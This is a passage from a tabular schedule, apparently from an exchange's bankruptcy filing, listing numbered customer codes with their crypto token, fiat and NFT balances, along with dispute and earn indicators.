| 07343481 | | DOGE[1], ETH[0], ETHW[0], MATIC[0], NFT (321106115635658900/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #18)[1], NFT (322355289165204118/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #55)[1], NFT (428401920937030501/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #27)[1], USD[0.00], USDT[0] | Yes | |
| 07343482 | | USD[10.00] | | |
| 07343483 | | BAT[4.05399948], BRZ[26.382045], BTC[.00000005], CUSDT[48.74776723], DOGE[0], GRT[1.00498957], SHIB[55614.36108615], SOL[17.84846336], TRX[4], USD[0.00], USDT[4.36075309] | Yes | |
| 07343484 | | USD[10.00] | | |
| 07343485 | | CUSDT[6], USD[0.01], USDT[0] | | |
| 07343486 | | USD[10.00] | | |
| 07343487 | | CUSDT[1], DOGE[5723.2194519], GRT[1], TRX[1], USD[10.00] | | |
| 07343488 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07343489 | | CUSDT[1], DOGE[.88918878], USD[0.00] | Yes | |
| 07343490 | | CUSDT[3], ETH[0], USD[0.00] | | |
| 07343491 | | BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[0], DOGE[87.94178051], ETH[0], GRT[0], PAXG[0], SOL[0], TRX[1], UNI[0], USD[29.60], YFI[0] | Yes | |
| 07343492 | | BRZ[0], USD[0.00], USDT[0.00022426] | | |
| 07343493 | | USD[10.00] | | |
| 07343494 | | ETH[.00580205], ETHW[.0057336], LINK[3.02459762], USD[0.00] | Yes | |
| 07343495 | | USD[10.00] | | |
| 07343496 | | DOGE[.32315778], USD[5.71] | | |
| 07343497 | | BCH[.02244681], CUSDT[3], DOGE[432.99820093], ETH[.13021555], ETHW[.12914853], LTC[.10972157], TRX[3], USD[0.00] | Yes | |
| 07343498 | | BRZ[1], CUSDT[4], USD[0.19] | | |
| 07343499 | | USD[10.00] | | |
| 07343500 | | BRZ[0], DOGE[0], USD[0.00] | | |
| 07343501 | | USD[10.00] | | |
| 07343502 | | USD[10.00] | | |
| 07343503 | | BRZ[5], CUSDT[25], GRT[.00017746], TRX[4], USD[1.27] | | |
| 07343504 | | BRZ[1], CUSDT[3], DOGE[.00005754], TRX[272.26939541], USD[0.01] | Yes | |
| 07343505 | | DOGE[2], USD[0.01] | | |
| 07343506 | | BRZ[1], CUSDT[5], GRT[2], TRX[6], USD[0.00], USDT[1] | | |
| 07343507 | | USD[10.00] | | |
| 07343508 | | BRZ[2], CUSDT[3], DOGE[3900.75993439], GRT[1.00498039], USD[0.00] | Yes | |
| 07343509 | | USD[10.00] | | |
| 07343510 | | BTC[.00174818], DOGE[1472.33839882], SHIB[1], USD[0.00] | | |
| 07343511 | | BRZ[1], CUSDT[2], ETH[.00000019], ETHW[.02015232], SHIB[3], USD[0.01] | Yes | |
| 07343512 | | CUSDT[1], DOGE[.0557311], USD[0.00] | Yes | |
| 07343513 | | BCH[0], BTC[0], CUSDT[3], DOGE[0], ETH[0], TRX[1.09256867], USD[0.00] | | |
| 07343514 | | USD[10.00] | | |
| 07343515 | | AVAX[.00046653], DOGE[1], LINK[0.00263292], SHIB[1], SOL[.00000001], TRX[3], USD[0.00] | Yes | |
| 07343516 | | USD[10.00] | | |
| 07343517 | | USD[10.00] | | |
| 07343518 | | CUSDT[8], TRX[1], USD[0.00] | | |
| 07343519 | | BTC[0], CUSDT[3], DOGE[4], NFT (559641210542567259/3D CATPUNK #9510)[1], SHIB[25032.62763392], SOL[0], USD[0.65], USDT[0.00081967] | Yes | |
| 07343520 | | USD[10.00] | | |
| 07343521 | | USD[10.00] | | |
| 07343522 | | USD[10.00] | | |
| 07343523 | | DOGE[0.00087726], SHIB[224398.79014577], USD[0.00], USDT[0] | Yes | |
| 07343524 | | USD[10.00] | | |
| 07343525 | | BAT[1], BRZ[3], CUSDT[6], DOGE[1], GRT[3], LINK[1], TRX[2], USD[0.01], USDT[2] | | |
| 07343526 | | USD[0.00] | | |
| 07343528 | | BRZ[0], BTC[0], DOGE[3.60814622], ETH[0], TRX[0], USD[0.00] | | |
| 07343529 | | GRT[4.53652422], USD[0.00] | Yes | |
| 07343530 | | DOGE[2], USD[0.01] | Yes | |
| 07343531 | | CUSDT[1], DOGE[1], ETH[0], GRT[1], TRX[2], USD[0.01] | | |
| 07343532 | | BTC[0], CUSDT[1], DAI[0], DOGE[2], ETH[0], TRX[0], USD[10.00] | | |
| 07343533 | | USD[10.00] | | |
| 07343535 | | DAI[.48394569], DOGE[0], TRX[156.22554869], USD[0.00] | | |
| 07343536 | | USD[10.00] | | |
| 07343537 | | DOGE[2], SOL[.00083685], TRX[3], USD[0.00] | Yes | |
| 07343538 | | CUSDT[1], USD[0.00] | | |
| 07343539 | | DOGE[106.4051674], USD[0.29] | | |
| 07343540 | | BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], UNI[0], USD[10.00] | | |
| 07343541 | | USD[0.00] | Yes | |
| 07343542 | | USD[10.00] | | |
| 07343543 | | USD[10.00] | | |
| 07343544 | | CUSDT[1], TRX[1], USD[0.00] | Yes | |
| 07343545 | | USD[10.00] | | |
| 07343546 | | USD[0.00] | | |
| 07343547 | | DOGE[3.26159822], TRX[.01587254], USD[30.18] | | |
| 07343548 | | BTC[.0000155], CUSDT[2], TRX[2], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07343549 | | CUSDT[1], DOGE[4094.88742388], USD[0.00] | | |
| 07343550 | | BRZ[3], BTC[.03857886], CUSDT[4], DOGE[7623.21428803], ETH[.26359547], ETHW[.26359547], SHIB[3], TRX[4], USD[651.45], USDT[1] | | |
| 07343551 | | USD[10.00] | | |
| 07343552 | | CUSDT[1], USD[0.00] | Yes | |
| 07343553 | | DOGE[.00085983], TRX[102.70982761], USD[0.29] | | |
| 07343554 | | DOGE[0], KSHIB[0], SHIB[91.40830272], USD[0.01], USDT[0] | Yes | |
| 07343555 | | USD[0.00] | Yes | |
| 07343556 | | BTC[.00021593], USD[0.00] | | |
| 07343557 | | USD[0.58] | | |
| 07343558 | | BRZ[1], CUSDT[3], DOGE[1.00000625], USD[46.82] | Yes | |
| 07343559 | | USD[10.00] | | |
| 07343560 | | GRT[7.26972691], USD[0.00] | | |
| 07343561 | | USD[0.00] | | |
| 07343562 | | USD[11.11] | Yes | |
| 07343563 | | BTC[.00020627], USD[0.00] | | |
| 07343565 | | AVAX[.0577959], BTC[.00034024], CUSDT[245.87165408], DOGE[74.49882221], ETH[.00335176], ETHW[.00335176], GRT[13.15003516], KSHIB[367.73006847], LINK[.65156463], LTC[.04431442], MATIC[3.09912845], SHIB[183823.52941176], SOL[.10141018], SUSHI[1.44038515], TRX[160.60348365], USD[0.01] | | |
| 07343566 | | USD[10.00] | | |
| 07343567 | | CUSDT[7], DOGE[4.10579604], TRX[1], USD[0.00] | Yes | |
| 07343568 | | BRZ[.00022802], MATIC[.00005284], TRX[.00069685], USD[0.01] | Yes | |
| 07343569 | | USD[0.00] | | |
| 07343570 | | USD[10.00] | | |
| 07343571 | | DOGE[946.72259914], ETH[.42937632], ETHW[0.42937632], GRT[1], TRX[1], USD[0.19] | | |
| 07343572 | | USD[10.00] | | |
| 07343573 | | BRZ[1], DOGE[2], GRT[0], SOL[0], TRX[2], USD[0.42] | | |
| 07343574 | | TRX[1], USD[11.44] | | |
| 07343575 | | BRZ[1], CUSDT[1], USD[185.38] | | |
| 07343576 | | USD[10.00] | | |
| 07343577 | | BF_POINT[200], DOGE[.516], ETH[.00085], ETHW[.00085] | | |
| 07343578 | | AVAX[.40659205], BRZ[1], CUSDT[5], DOGE[591.31558871], ETH[.01587058], ETHW[.01567906], GRT[1.0040172], LTC[.15377805], NFT (551315073306258514/Lorenz #356)[1], SHIB[1], SOL[.15980584], TRX[4], USD[34.97], USDT[1.09925169] | Yes | |
| 07343579 | | BAT[0], BRZ[.00789266], BTC[.00026686], CUSDT[1.96861669], DOGE[0.00028858], ETH[.00258053], ETHW[.00258053], TRX[0.09999706], USD[0.00] | | |
| 07343580 | | USD[10.00] | | |
| 07343581 | | USD[10.00] | | |
| 07343582 | | USD[10.00] | | |
| 07343583 | | USD[10.00] | | |
| 07343584 | | BAT[1.0165555], BRZ[3], CUSDT[6], DOGE[6563.72850901], GRT[2.06418617], LINK[2.17930371], SHIB[291.60158866], TRX[.32408108], USD[0.00], USDT[1.08644713] | Yes | |
| 07343585 | | BRZ[0], BTC[0], DOGE[0], ETH[0.00205409], ETHW[0.00205409], USD[0.01], USDT[0] | | |
| 07343586 | | BAT[0], BTC[0], DOGE[19.48662600], ETH[0], GRT[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07343588 | | CUSDT[2], DOGE[0], SHIB[1], USD[0.01] | Yes | |
| 07343589 | | USD[0.00] | | |
| 07343590 | | USD[10.00] | | |
| 07343591 | | USD[10.00] | | |
| 07343592 | | CUSDT[2], DOGE[1], USD[0.00] | | |
| 07343593 | | DOGE[20.93029951], USD[0.00] | Yes | |
| 07343594 | | BRZ[1], BTC[0], CUSDT[4], DOGE[2], SHIB[1], TRX[1], USD[0.01], USDT[1] | | |
| 07343595 | | USD[10.00] | | |
| 07343596 | | GRT[1], USD[0.10] | | |
| 07343597 | | CUSDT[1], DOGE[.00029568], USD[7.71] | | |
| 07343598 | | USD[10.00] | | |
| 07343599 | | USD[10.00] | | |
| 07343600 | | DOGE[3904.80112175], USD[0.00] | Yes | |
| 07343601 | | USD[10.00] | | |
| 07343602 | | SHIB[244180.02010298], USD[0.00] | | |
| 07343603 | | CUSDT[2], TRX[2], USD[0.01], USDT[0] | | |
| 07343604 | | TRX[67.01630861], USD[0.00] | | |
| 07343605 | | BTC[.00035716], CAD[0.00], CUSDT[1], DOGE[23.73576337], USD[12.26] | | |
| 07343606 | | BAT[4], BRZ[6], BTC[0], CUSDT[4], DOGE[1], ETH[0], GRT[2], SOL[0], SUSHI[0], TRX[7], UNI[0], USD[0.00], USDT[0] | | |
| 07343607 | | USD[10.00] | | |
| 07343608 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07343609 | | USD[0.00] | | |
| 07343610 | | BAT[.099436], BRZ[2], CUSDT[6], DOGE[0], SOL[.00456165], TRX[4.98116079], USD[0.01], USDT[1] | | |
| 07343611 | | DAI[.00000871], DOGE[0], LTC[0], USD[0.00] | | |
| 07343612 | | BTC[0], TRX[152.98157317], USD[0.00] | | |
| 07343613 | | USD[10.00] | | |
| 07343614 | | USD[10.00] | | |
| 07343615 | | CUSDT[3], DOGE[2623.65000089], ETH[.32094176], ETHW[.32094176], TRX[1], USD[0.01] | | |
| 07343616 | | USD[243.42] | | |
| 07343617 | | DOGE[1], USD[0.00] | | |
| 07343618 | | USD[0.00] | | |
| 07343619 | | USD[10.00] | | |
| 07343620 | | USD[0.01] | | |
| 07343621 | | TRX[1], USD[0.00] | | |
| 07343622 | | USD[10.00] | | |
| 07343623 | | BAT[1], BRZ[1], BTC[0], CUSDT[7], DOGE[6811.64349741], ETH[0], ETHW[0], SOL[1], SUSHI[0], TRX[4], USD[16.13], USDT[1] | | |
| 07343624 | | USD[10.00] | | |
| 07343625 | | BRZ[2], CUSDT[11], USD[0.00] | | |
| 07343626 | | KSHIB[0], SHIB[0], USD[0.05] | Yes | |
| 07343627 | | CUSDT[1], DOGE[2235.39105806], USD[0.00] | | |
| 07343629 | | BTC[0], DAI[0], ETH[0], GRT[0], USD[0.00] | | |
| 07343630 | | CUSDT[1], DOGE[1], ETH[.00157967], ETHW[.00156599], TRX[1], USD[0.00] | Yes | |
| 07343631 | | BRZ[2], CUSDT[4], DOGE[1.00002854], TRX[1], USD[0.01] | | |
| 07343633 | | BTC[0], DOGE[0], ETH[.00000001], ETHW[0], TRX[0], USD[0.00], USDT[0] | | |
| 07343634 | | CUSDT[3], DOGE[31.92644598], TRX[1], USD[0.00] | | |
| 07343635 | | DOGE[0], ETH[0], LTC[0], TRX[2], UNI[0], USD[0.00] | | |
| 07343637 | | TRX[2], USD[0.00] | Yes | |
| 07343638 | | BAT[1], BRZ[8], CUSDT[31], GRT[4], TRX[14], USD[0.01], USDT[2] | | |
| 07343639 | | USD[0.00] | | |
| 07343640 | | USD[10.00] | | |
| 07343641 | | USD[10.00] | | |
| 07343642 | | USD[10.00] | | |
| 07343643 | | DOGE[1.0000803], USD[0.00] | | |
| 07343644 | | SHIB[1], TRX[2], USD[36.64] | | |
| 07343645 | | USD[0.01] | | |
| 07343646 | | BTC[.00676143], USD[0.00] | | |
| 07343647 | | ETH[0], ETHW[0], SHIB[0], SOL[0.00000449], USD[0.00] | Yes | |
| 07343648 | | USD[10.00] | | |
| 07343649 | | USD[10.00] | | |
| 07343650 | | CUSDT[1], DOGE[5], LTC[0], TRX[1], USD[9.91] | | |
| 07343652 | | BRZ[3], CUSDT[13], TRX[3], USD[0.46], USDT[0] | | |
| 07343653 | | USD[0.00] | | |
| 07343655 | | BTC[.00547274], USD[0.00] | | |
| 07343656 | | USD[10.00] | | |
| 07343657 | | USD[0.00] | Yes | |
| 07343658 | | BRZ[2], BTC[.00510699], CUSDT[5], DOGE[5327.19161825], ETH[.14694047], ETHW[.14694047], TRX[683.27532444], USD[0.67] | | |
| 07343659 | | CUSDT[2], TRX[2], USD[0.01], USDT[0] | | |
| 07343660 | | USD[10.00] | | |
| 07343661 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07343662 | | GRT[6.5481545], USD[0.00] | Yes | |
| 07343663 | | USD[0.00] | | |
| 07343664 | | DOGE[1], USD[0.00] | | |
| 07343665 | | BTC[0], CUSDT[2], DOGE[0], TRX[0], USD[0.00] | Yes | |
| 07343666 | | BAT[1.01091264], BRZ[2], CUSDT[1], DOGE[160914.52309126], GRT[1.00265331], LINK[152.84199649], MATIC[5221.19190338], SHIB[276921380.10437071], SOL[222.45131084], SUSHI[2.12460406], TRX[45233.21222713], USD[0.00], USDT[3.20767308] | Yes | |
| 07343667 | | USD[10.00] | | |
| 07343668 | | DOGE[15.21618208], USD[0.00] | | |
| 07343669 | | USD[10.00] | | |
| 07343670 | | BRZ[2], CUSDT[2], DOGE[87095.70507424], TRX[1], UNI[1], USD[0.30] | | |
| 07343671 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07343672 | | ETH[0], USD[0.00], USDT[0] | | |
| 07343673 | | DOGE[1], USD[0.01] | | |
| 07343674 | | USD[10.00] | | |
| 07343675 | | USD[10.00] | | |
| 07343676 | | USD[10.00] | | |
| 07343677 | | USD[0.00] | | |
| 07343678 | | ETH[.02574636], ETHW[.02574636], TRX[1], USD[0.00] | | |
| 07343679 | | USD[10.00] | | |
| 07343680 | | USD[10.00] | | |
| 07343681 | Contingent, Disputed | USD[10.00] | | |
| 07343682 | | USD[10.00] | | |
| 07343683 | | BRZ[2], CUSDT[3], SHIB[2], TRX[3], USD[0.00], USDT[1.0880059] | Yes | |
| 07343684 | | DOGE[1], USD[0.00] | | |
| 07343685 | | DOGE[7668.1233998], TRX[2], USD[0.00] | Yes | |
| 07343686 | | SHIB[50971.49287169], USD[0.00], USDT[0] | | |
| 07343688 | | BTC[0], CUSDT[11], DOGE[73.91994578], TRX[4], USD[0.00] | | |
| 07343689 | | BTC[.00008], DOGE[588.02], USD[7.47] | | |
| 07343690 | | USD[10.00] | | |
| 07343691 | | USD[10.00] | | |
| 07343692 | | USD[10.00] | | |
| 07343693 | | GRT[8.51918124], USD[0.00] | Yes | |
| 07343694 | | USD[10.00] | | |
| 07343695 | | USD[10.00] | | |
| 07343697 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07343698 | | CUSDT[2], DOGE[1], ETH[.1581432], ETHW[.1581432], USD[0.10] | | |
| 07343699 | | USD[10.00] | | |
| 07343700 | | USD[10.00] | | |
| 07343701 | | BRZ[3], CUSDT[8], GRT[1], TRX[4], USD[0.01] | | |
| 07343702 | | USD[10.00] | | |
| 07343703 | | BCH[.00050135], BRZ[.00006307], CUSDT[7], SHIB[2.02561118], TRX[.00001818], USD[0.00] | Yes | |
| 07343704 | | BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], TRX[0], USD[0.00], USDT[0] | | |
| 07343705 | | USD[10.00] | | |
| 07343706 | | USD[10.00] | | |
| 07343707 | | BRZ[1], CUSDT[2], DOGE[0], USD[0.00] | | |
| 07343708 | | USD[10.00] | | |
| 07343709 | | USD[10.00] | | |
| 07343710 | | BRZ[2], DOGE[3], TRX[2], USD[10.00] | | |
| 07343711 | | CUSDT[2], DOGE[.00008019], TRX[2], USD[0.28] | | |
| 07343713 | | USD[10.00] | | |
| 07343714 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07343715 | | DOGE[1], USD[0.00] | Yes | |
| 07343716 | | USD[10.00] | | |
| 07343717 | | USD[13.69] | Yes | |
| 07343718 | | USD[10.00] | | |
| 07343719 | | ETH[.00568494], ETHW[.00568494], USD[0.00] | | |
| 07343720 | | BTC[.0649625], CUSDT[1], DOGE[1], USD[10.00] | | |
| 07343721 | | DOGE[0], ETH[0], ETHW[0], TRX[0], USD[0.00] | | |
| 07343722 | | CUSDT[1], SUSHI[.45441217], USD[0.00] | | |
| 07343723 | | USD[10.00] | | |
| 07343724 | | USD[10.00] | | |
| 07343726 | | USD[10.00] | | |
| 07343727 | | CUSDT[1], USD[0.00] | Yes | |
| 07343728 | | USD[10.00] | | |
| 07343729 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07343730 | | BRZ[0.00000005], CUSDT[1], DOGE[0], GRT[0.00001115], TRX[3], USD[0.00], USDT[0] | | |
| 07343731 | | USD[10.00] | | |
| 07343732 | | USD[10.00] | | |
| 07343733 | | BRZ[1], CUSDT[4], TRX[3], USD[0.00], USDT[0.00036008] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07343734 | | USD[10.00] | | |
| 07343735 | | DOGE[1], USD[0.01] | | |
| 07343736 | | USD[110.00] | | |
| 07343737 | | USD[0.12] | | |
| 07343738 | | USD[10.00] | | |
| 07343739 | | USD[10.00] | | |
| 07343740 | | CUSDT[6], DOGE[2.88909178], TRX[1], USD[0.00], USDT[0] | | |
| 07343741 | | USD[10.24] | Yes | |
| 07343742 | | USD[0.00] | | |
| 07343744 | | USD[0.00] | | |
| 07343745 | | USD[10.00] | | |
| 07343746 | | BTC[.00000683], ETH[.00002994], SOL[.00032336], USD[0.06], USDT[0.00000001] | Yes | |
| 07343747 | | BRZ[1], CUSDT[3], DOGE[1], TRX[391.88207142], USD[6.32] | | |
| 07343748 | | USD[10.00] | | |
| 07343749 | | USD[0.01] | | |
| 07343750 | | BRZ[1], CUSDT[2], GRT[1], SHIB[688138.52628681], USD[0.00] | | |
| 07343752 | | BCH[.00005219], BRZ[23.43706049], CUSDT[484.56194555], DOGE[31.83804705], GRT[.24541728], LINK[.03358325], USD[-10.67], USDT[0] | | |
| 07343753 | | USD[10.00] | | |
| 07343754 | | USD[10.00] | | |
| 07343755 | | DOGE[1], ETH[.01788798], ETHW[.01788798], USD[10.00] | | |
| 07343756 | | USD[10.00] | | |
| 07343757 | | USD[10.00] | | |
| 07343758 | | BRZ[2], CUSDT[2], DOGE[.07309591], TRX[1], USD[1.59], USDT[0.00000001] | | |
| 07343759 | | USD[10.00] | | |
| 07343760 | | CUSDT[1], DOGE[6.20654294], USD[0.00] | Yes | |
| 07343761 | | USD[10.00] | | |
| 07343762 | | USD[10.00] | | |
| 07343763 | | USD[10.00] | | |
| 07343764 | | USD[10.00] | | |
| 07343765 | | USD[10.00] | | |
| 07343766 | | BAT[1.01122216], BRZ[4], CUSDT[2], GRT[1.00001826], SOL[8.17548547], TRX[4], USD[0.00] | Yes | |
| 07343767 | | DOGE[4592.53257848], TRX[1], USD[10.00] | | |
| 07343768 | | CUSDT[1], DOGE[351.21360035], USD[7.84] | | |
| 07343769 | | USD[0.00] | Yes | |
| 07343770 | | BTC[.0015916], DOGE[1], EUR[0.00], GBP[14.32], TRX[1], USD[91.35] | | |
| 07343771 | | USD[10.00] | | |
| 07343772 | | BAT[1.0165555], TRX[1], USD[0.01] | Yes | |
| 07343773 | | USD[10.00] | | |
| 07343774 | | USD[10.00] | | |
| 07343775 | | ETH[.000832], ETHW[.000832] | | |
| 07343776 | | BRZ[0], USD[0.00] | Yes | |
| 07343777 | | USD[0.00] | | |
| 07343778 | | USD[10.00] | | |
| 07343779 | | BRZ[1], CUSDT[2], DOGE[1.00002627], TRX[2], USD[0.00] | | |
| 07343780 | | BTC[.00010511], DOGE[166.48331535], LINK[0.56537101], LTC[.54327898], SHIB[0], SOL[1.75671881], TRX[.00095438], USD[1.91] | Yes | |
| 07343781 | | BF_POINT[300], DOGE[1], GRT[1.00279843], NFT (296164322663485836/Leaves of the Metaverse)[1], NFT (411918730676506552/Balconies of the skies)[1], SOL[21.85595487], SUSHI[11.5008636], TRX[1], USD[1000.22] | Yes | |
| 07343782 | | BAT[0], BCH[0], BTC[0], DOGE[0], ETH[0], ETHW[0], LTC[0], SOL[0], TRX[0], UNI[0], USD[0.01], USDT[0] | | |
| 07343783 | | BAT[2.1324762], BRZ[2], BTC[0], CUSDT[2], DOGE[0], ETH[0.00188733], ETHW[0.00185997], GRT[1.00498957], TRX[11.44680846], USD[0.01], USDT[1.11043116] | Yes | |
| 07343784 | | DOGE[6169.43272267], SHIB[10683775.29146745], USD[35.98] | | |
| 07343785 | | USD[10.00] | | |
| 07343787 | | USD[10.00] | | |
| 07343788 | | BCH[.00831727], BRZ[1], BTC[0], CUSDT[9], TRX[4], USD[0.01] | | |
| 07343789 | | USD[10.00] | | |
| 07343790 | | USD[10.00] | | |
| 07343791 | | CUSDT[2], DOGE[7684.92725566], SHIB[1473804.05499198], TRX[102.9835558], USD[0.00] | Yes | |
| 07343792 | | USD[10.00] | | |
| 07343793 | | USD[10.00] | | |
| 07343794 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07343796 | | BTC[0], USD[0.83], USDT[0] | | |
| 07343797 | | CUSDT[1], DOGE[0], USD[0.00] | | |
| 07343798 | | USD[0.01] | | |
| 07343799 | | USD[10.00] | | |
| 07343800 | | CUSDT[1], DOGE[8371.75304958], TRX[2], USD[0.00] | Yes | |
| 07343801 | | SUSHI[15.18073096], UNI[28.60179454], USD[0.60] | | |
| 07343802 | | BRZ[3], CUSDT[9], DOGE[0], ETH[0], GRT[1.00367791], TRX[7], USD[0.00], USDT[1.08938798] | Yes | |
| 07343803 | | USD[10.00] | | |
| 07343804 | | CUSDT[4], SHIB[129900.23259895], USD[10.53] | Yes | |
| 07343805 | | USD[11.08] | Yes | |
| 07343806 | | BRZ[0], CUSDT[1], DOGE[4], GRT[0], SOL[0], SUSHI[0], UNI[0], USD[0.00] | | |
| 07343807 | | DOGE[123.63658213], USD[0.00] | | |
| 07343808 | | USD[10.00] | | |
| 07343809 | | USD[0.00] | | |
| 07343810 | | CUSDT[2], TRX[227.32388186], USD[0.00] | Yes | |
| 07343813 | | USD[10.00] | | |
| 07343814 | | BTC[.0779881], ETH[1.40578], ETHW[1.42778], SOL[2.1657], SUSHI[5.4575], USD[0.42] | | |
| 07343815 | | USD[10.00] | | |
| 07343816 | | USD[10.00] | | |
| 07343817 | | DOGE[1], USD[52.85] | | |
| 07343818 | | USD[10.44] | Yes | |
| 07343819 | | USD[10.00] | | |
| 07343820 | | BRZ[1], USD[0.01] | | |
| 07343821 | | USD[10.00] | | |
| 07343822 | | BTC[0], CUSDT[2], DOGE[.00002114], USD[0.00] | | |
| 07343823 | | USD[8.43] | | |
| 07343825 | | DOGE[.28305], USD[0.00] | | |
| 07343826 | | CUSDT[1], USD[0.00], USDT[1] | | |
| 07343827 | | DOGE[1], USD[0.30] | | |
| 07343828 | | USD[10.00] | | |
| 07343829 | | GRT[82.35762954], USD[2.40] | | |
| 07343830 | | DOGE[0], USD[0.00], USDT[0] | | |
| 07343831 | | USD[10.00] | | |
| 07343832 | | DOGE[.00004773], USD[0.00] | | |
| 07343834 | | CUSDT[1], DOGE[.00013967], USD[10.00] | | |
| 07343835 | | DOGE[16147.54386637], USD[0.00] | | |
| 07343836 | | USD[10.00] | | |
| 07343837 | | USD[10.00] | | |
| 07343838 | | USD[10.00] | | |
| 07343839 | | BRZ[0], DOGE[7346.35285307], USD[0.01] | Yes | |
| 07343840 | | DOGE[849.21821336], USD[7.69] | | |
| 07343841 | | BAT[1], BRZ[1], CUSDT[4], GRT[3], SHIB[0], USD[0.00], USDT[2] | | |
| 07343842 | | BRZ[0], DOGE[0], TRX[.00872782], USD[0.00] | | |
| 07343843 | | BAT[40.1875651], DOGE[3], USD[10.00] | | |
| 07343845 | | BAT[.00001287], CUSDT[13.00002429], DOGE[0], GRT[.00001348], SHIB[606.43240047], SOL[5.33336088], SUSHI[1.28866209], TRX[24.36108276], UNI[.00004758], USD[0.00] | Yes | |
| 07343846 | | USD[10.00] | | |
| 07343847 | | USD[10.00] | | |
| 07343848 | | USD[10.00] | | |
| 07343849 | | USD[10.00] | | |
| 07343850 | | DOGE[84.95519721], SGD[6.56], USD[0.05] | | |
| 07343851 | | USD[10.00] | | |
| 07343852 | | USD[10.00] | | |
| 07343853 | | AUD[0.00], BRZ[0], CUSDT[10.82079223], DOGE[0], ETH[0], EUR[0.00], GBP[0.00], GRT[0], LTC[0], SUSHI[0], TRX[287.56258936], UNI[0], USD[0.00], USDT[0] | | |
| 07343854 | | CUSDT[3], DOGE[1274.85599401], USD[0.00] | | |
| 07343855 | | USD[10.00] | | |
| 07343856 | | BTC[0], DAI[0], DOGE[0], ETH[0.00072701], ETHW[0.00072701], GRT[0], LTC[0], NFT (310178766824072292/GSW Round 1 Commemorative Ticket #676)[1], NFT (312869040427666981/GSW Western Conference Semifinals Commemorative Ticket #607)[1], NFT (316852530084268642/Warriors 75th Anniversary City Edition Diamond #203)[1], NFT (320894787792267367/Exclusive 2974 Collection Merchandise Package #2183 (Redeemed)[1], NFT (331513188190138296/GSW Championship Commemorative Ring)[1], NFT (442880115484327183/Birthday Cake #1943)[1], NFT (489544346075758189/The 2974 Collection #1943)[1], NFT (547385657837740007/Warriors Foam Finger #432 (Redeemed))[1], NFT (548210440136502743/GSW Western Conference Finals Commemorative Banner #1907)[1], SOL[0], SUSHI[0], USD[0.05] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07343857 | | USD[11.09] | Yes | |
| 07343858 | | USD[0.01] | | |
| 07343860 | | BRZ[1], CUSDT[11], DOGE[36.57095208], SHIB[356190.568529], TRX[1], USD[0.01] | Yes | |
| 07343862 | | USD[10.00] | | |
| 07343863 | | CUSDT[22], DOGE[7731.71262974], ETH[1.08933604], ETHW[1.0888685], SHIB[22854.81207134], TRX[4235.85190399], USD[0.00] | Yes | |
| 07343864 | | USD[10.00] | | |
| 07343865 | | USD[10.00] | | |
| 07343867 | | BTC[0.00000001], ETH[0.00000001], ETHW[0.00000001], SOL[.00000001], SUSHI[.001], USD[0.00], USDT[0] | | |
| 07343868 | | USD[10.00] | | |
| 07343869 | | USD[0.00] | | |
| 07343870 | | USD[10.00] | | |
| 07343871 | | USD[10.00] | | |
| 07343872 | | CUSDT[1], SOL[.10643953], USD[0.00] | Yes | |
| 07343873 | | DOGE[0.11634052], USD[0.00] | | |
| 07343874 | | DOGE[17.73108874], USD[0.00] | | |
| 07343875 | | LINK[.32979561], USD[0.00] | Yes | |
| 07343876 | | DOGE[15146.34278562], TRX[1], USD[0.00] | Yes | |
| 07343877 | | USD[0.00] | Yes | |
| 07343878 | | USD[10.00] | | |
| 07343879 | | DOGE[140.597519], USD[0.00] | | |
| 07343881 | | BAT[0], BRZ[0], BTC[0], DOGE[0], ETH[0], TRX[0], USD[0.00], USDT[0] | | |
| 07343882 | | USD[10.00] | | |
| 07343883 | | USD[10.00] | | |
| 07343884 | | DOGE[1.4701342], USD[0.10] | | |
| 07343885 | | BTC[0], CUSDT[1], SOL[.52578899], USD[0.00], USDT[0.00000004] | | |
| 07343886 | | CUSDT[1], USD[0.01] | | |
| 07343887 | | DOGE[18.88315375], USD[0.00], USDT[0] | | |
| 07343888 | | USD[10.00] | | |
| 07343889 | | BTC[0.00005628], CUSDT[15], TRX[2.00422529], USD[0.00] | Yes | |
| 07343890 | | USD[10.00] | | |
| 07343891 | | USD[0.00] | Yes | |
| 07343892 | | USD[10.00] | | |
| 07343893 | | USD[10.00] | | |
| 07343894 | | USD[10.00] | | |
| 07343895 | | CUSDT[1], DOGE[.00058511], TRX[1], USD[0.72] | | |
| 07343897 | | TRX[191.94756913], USD[0.00] | | |
| 07343898 | | CUSDT[1], USD[0.00] | | |
| 07343899 | | USD[10.00] | | |
